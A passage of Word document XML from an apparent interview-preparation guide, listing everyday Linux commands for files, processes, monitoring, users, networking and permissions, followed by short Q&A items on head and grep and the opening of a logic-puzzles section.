        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays the last few lines of a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D60C5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file.txt        # Default shows last 10 lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA46D6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n 20 file.txt  # Show last 20 lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5504DAC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ano</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vi</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Opens a text editor to modify files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364B16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ano file.txt        # Open file in Nano editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A59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 file.txt          # Open file in Vi editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6056ADF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rocess Management Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785C9F3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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays information about running processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1453F91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 Show processes running in the current terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7486A1C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aux          # Show all running processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF8DCE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a dynamic real-time view of the system's processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454072B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Show real-time process statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547D079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w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sends a signal to terminate a process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B98AE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 1234       # Terminate process with PID 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B73057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kill -9 1234    # Force terminate the process with PID 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A6349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all</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Terminates all processes by name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413BAC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all firefox # Kill all processes with the name 'firefox'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295BD79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g</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Resumes a job in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436B846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g               # Resume job in the background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC3C3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g</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Brings a job to the foreground.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0728574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g               # Bring a background job to the foreground</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A95E17"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ystem Monitoring Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498B78A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f</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Shows disk space usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069FEEB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 Display disk space usage for all mounted filesystems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4095B2B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h            # Display disk space in human-readable format (e.g., GB, MB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F6780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u</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Shows disk usage for files and directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6701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file.txt      # Show size of a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA7DF3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sh directory # Show total size of a directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2C5C6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w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE210F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 Show memory usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B1D85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h          # Show in human-readable format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC5E1D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time</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Shows how long the system has been running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E76CE1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ptime           # Shows the system's uptime and load averages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECC933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o</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays who is logged into the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193920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o              # Shows who is logged into the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA418B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system resources and process statistics dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155633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Displays system processes and resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270A2B7A"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ser Management Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C32ABC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add</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adds a new user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF5D86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add username  # Create a new user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487C983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sswd</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Changes a user’s password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE8BF9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sswd username   # Change password for a specific user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720BBC0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mod</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Modifies a user account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473867C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mod -aG group username   # Add user to a group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F2090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roupadd</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adds a new group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3551DD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add groupname  # Create a new group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A50D2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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays user and group IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F5592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d username       # Shows user and group ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D69B61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Networking Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7B352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ng</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sends ICMP echo requests to test connectivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B2AD6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ng google.com    # Ping google.com to check connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B2FD8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fconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays or configures network interfaces (older command, replaced by ip).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB58F0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config           # Show network interfaces and their IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723C7E4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p</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A more modern way to configure network interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C4F3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p addr show       # Show network interfaces and their IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBF99E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tstat</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays network connections, routing tables, and interface statistics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3480D3B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stat -tuln      # Show all active network connections and listening ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4608C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rl</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Transfers data from or to a server using various protocols (HTTP, FTP, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CBFE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url http://example.com   # Fetch data from a URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FED5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get</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Downloads files from the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695A63C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get http://example.com/file.zip  # Download a file from the internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB22135"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File Permissions Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB0C14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mod</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Changes file permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F37E2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755 file.txt     # Change file permissions (rwxr-xr-x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163BBBA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x file.sh       # Give execute permission to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9B619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own</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Changes the ownership of a file or directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFCC3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user:group file.txt    # Change file owner to 'user' and group to 'group'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EED0A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grp</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Changes the group ownership of a file or directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C1C4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grp group file.txt       # Change the group ownership of the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129D8760" w14:textId="77777777" w:rsidR="00603AFC"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45ADA">
          <v:rect id="_x0000_i3917" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="405F2BE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3918" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA2D955" w14:textId="3A84D059" w:rsidR="005F7378" w:rsidRPr="00CE4B95" w:rsidRDefault="001072AE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="970" w:name="_Toc197868184"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Command - Read a file and print first two lines from file Ans. head -2 filename</w:t>
      </w:r>
      <w:r w:rsidR="005F7378" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="970"/>
    </w:p>
    <w:p w14:paraId="28BCD059" w14:textId="760D3E58" w:rsidR="00603AFC" w:rsidRPr="00617E2C" w:rsidRDefault="00603AFC"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 the correct command to read a file and print the first two lines is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E91A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 filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64787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is the command used to display the first few lines of a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAD98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n 2 option specifies that only the first 2 lines should be displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD2232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lternatively, you can use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9A9C4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2 filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786B24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oth commands will achieve the same result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FAC24C" w14:textId="4F11AC5B"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3919" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7FBB3B" w14:textId="4F185398" w:rsidR="008A7CBE" w:rsidRPr="00CE4B95" w:rsidRDefault="009E1D31">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="971" w:name="_Toc197868185"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Search a word from a file</w:t>
      </w:r>
      <w:r w:rsidR="008A7CBE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="971"/>
    </w:p>
    <w:p w14:paraId="153E9AF5" w14:textId="76C241D8" w:rsidR="008A7CBE" w:rsidRPr="00617E2C" w:rsidRDefault="00FC58F7" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>grep 'word' filename ack 'pattern' /path/to/file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDCD440" w14:textId="77777777" w:rsidR="00BB0C71" w:rsidRPr="00617E2C" w:rsidRDefault="00BB0C71" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FBFF74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search for a word in a file, you can use the grep command in Linux. Here's the syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727D7331"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word" filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B9254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s used to search for patterns in files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D8B03F"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ord" is the word or pattern you're searching for (replace this with your actual search term).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EE4059"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lename is the name of the file in which you want to search for the word.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C27598B"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xample, to search for the word "hello" in a file named file.txt, the command would be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA300B6"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hello" file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145F477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you want to make the search case-insensitive, you can use the -i flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2644A7A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 "hello" file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E1415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display the line numbers where the word appears, you can use the -n flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06953207"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n "hello" file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE571FA" w14:textId="2FFE8128"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3920" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A16913E" w14:textId="38AC6BA3" w:rsidR="002D2F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="002D2F4B">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eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E564FD2" w14:textId="30411457" w:rsidR="002B15DE" w:rsidRPr="00CE4B95" w:rsidRDefault="0006226F" w:rsidP="002B15DE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="972" w:name="_Toc197868186"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Puzzles</w:t>
      </w:r>
      <w:bookmarkEnd w:id="972"/>
    </w:p>
    <w:p w14:paraId="3FA2DA04" w14:textId="45AE01FD" w:rsidR="00340E57" w:rsidRPr="00CE4B95" w:rsidRDefault="00340E57">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="973" w:name="_Toc197868187"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Puzzle – 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="973"/>
    </w:p>
    <w:p w14:paraId="35752902" w14:textId="5B329C4B" w:rsidR="0006226F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF5640" w:rsidP="001576F0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00E00477" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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p>
    <w:p w14:paraId="040CDC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Divide 9 balls into 3 groups of 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C71A261" w14:textId="77777777" w:rsidR="00E00477" w:rsidRPr="00CE4B95" w:rsidRDefault="00E00477" w:rsidP="00E00477">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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igh Group 1 vs Group 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6F60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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If both are equal → heavier ball is in Group 3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Heavier side contains the heavy ball.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D3BCFA"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Take the heavier group → pick any 2 balls and weigh them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330561D7"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 → third is heavier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70875696"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t equal → heavier one is found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDCFDB8" w14:textId="419625B5" w:rsidR="00E87629" w:rsidRPr="00CE4B95"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3921" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0920F2" w14:textId="06354E70" w:rsidR="007213E8" w:rsidRPr="00CE4B95" w:rsidRDefault="007213E8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="974" w:name="_Toc197868188"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Puzzle – 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="974"/>
    </w:p>
    <w:p w14:paraId="68FBFC2F" w14:textId="7A060F49"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You are doing some gardening, and need exactly 4 </w:t>
      </w:r>
      <w:r w:rsidR="007213E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>litres</w:t>
